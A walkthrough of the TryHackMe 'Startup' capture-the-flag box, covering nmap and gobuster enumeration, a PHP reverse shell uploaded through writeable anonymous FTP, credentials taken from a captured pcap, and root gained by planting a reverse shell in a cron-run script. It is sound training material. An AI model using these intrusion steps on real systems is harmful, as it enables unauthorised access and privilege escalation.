6 minutes
THM: Startup
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.169.50 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 01:07 GMT
Nmap scan report for 10.10.169.50
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.11.18.78
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds
FTP
Lets start with FTP, and according to nmap it is accessible as an anonymous user
# ftp -A 10.10.169.50
Connected to 10.10.169.50.
220 (vsFTPd 3.0.3)
Name (10.10.169.50:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 .
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 ..
-rw-r--r-- 1 0 0 5 Nov 12 2020 .test.log
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp
-rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
It is indeed readable. There was nothing inside the ftp directory, however it was writeable. Looking through the files there was nothing of note
Website
The website just has a simple message on it
So lets run gobuster
# gobuster dir -u http://10.10.169.50 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.169.50
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/files (Status: 301) [Size: 312] [--> http://10.10.169.50/files/]
/index.html (Status: 200) [Size: 808]
/server-status (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Checking out the files directory we can see a listing that looks like the FTP directory
Knowing that this directory is writeable we can upload a reverse shell via FTP. In this case I use the pentest monkey PHP reverse shell. This is just a case of starting a listener and visiting the shell to trigger the connection
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.169.50] 59154
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
01:19:46 up 22 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
Reverse shell
Looking around the box we dont have enough rights for the user flag, so its a case of finding something we can escalate with. There are a couple of interesting files on the system, including a pcap file in a directory called incidents so we will transfer that
$ ls
bin
boot
dev
etc
home
incidents
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
recipe.txt
root
run
sbin
snap
srv
sys
tmp
usr
vagrant
var
vmlinuz
vmlinuz.old
$ cd incidents
$ ls
suspicious.pcapng
$ python3 -m http.server 8080
Looking through the capture in wireshark we can see traffic that looks like its from a reverse shell. Following the data we find what looks like a username and password
Logging in with the discovered details via SSH gets us the user flag
# ssh lennie@10.10.169.50
The authenticity of host '10.10.169.50 (10.10.169.50)' can't be established.
ED25519 key fingerprint is SHA256:v4Yk83aT8xnOB+pdfmlLuJY1ztw/bXsFd1cl/xV07xY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.169.50' (ED25519) to the list of known hosts.
lennie@10.10.169.50's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
44 packages can be updated.
30 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ ls
Documents scripts user.txt
$ cat user.txt
THM{0******************************9}
Privilege escalation
Looking around in lennie’s home directory there are some scripts, however they are not owned by him
$ ls -lah
total 24K
drwx------ 5 lennie lennie 4.0K Mar 22 16:18 .
drwxr-xr-x 3 root root 4.0K Nov 12 2020 ..
drwx------ 2 lennie lennie 4.0K Mar 22 16:18 .cache
drwxr-xr-x 2 lennie lennie 4.0K Nov 12 2020 Documents
drwxr-xr-x 2 root root 4.0K Nov 12 2020 scripts
-rw-r--r-- 1 lennie lennie 38 Nov 12 2020 user.txt
$ cd scripts
$ ls -lah
total 16K
drwxr-xr-x 2 root root 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K Mar 22 16:18 ..
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 Mar 22 16:21 startup_list.txt
Looking inside the planner script we can see it is calling another script which we do have write access over
$ cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
$ cat /etc/print.sh
#!/bin/bash
echo "Done!"
$ ls -l /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
Based on the strange ownership we guess that there is either a process to trigger the script, or it is running on cron. So we put a reverse shell line into /etc/print.sh and start and listener. Almost straight away we get a shell back as root so we can get the root flag. Also checking root’s crontab we can confirm our guess for how things worked
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.169.50] 49088
bash: cannot set terminal process group (1434): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@startup:~# cat /root/root.txt
cat /root/root.txt
THM{f******************************d}
root@startup:~#
root@startup:~# crontab -l
crontab -l
* * * * * /home/lennie/scripts/planner.sh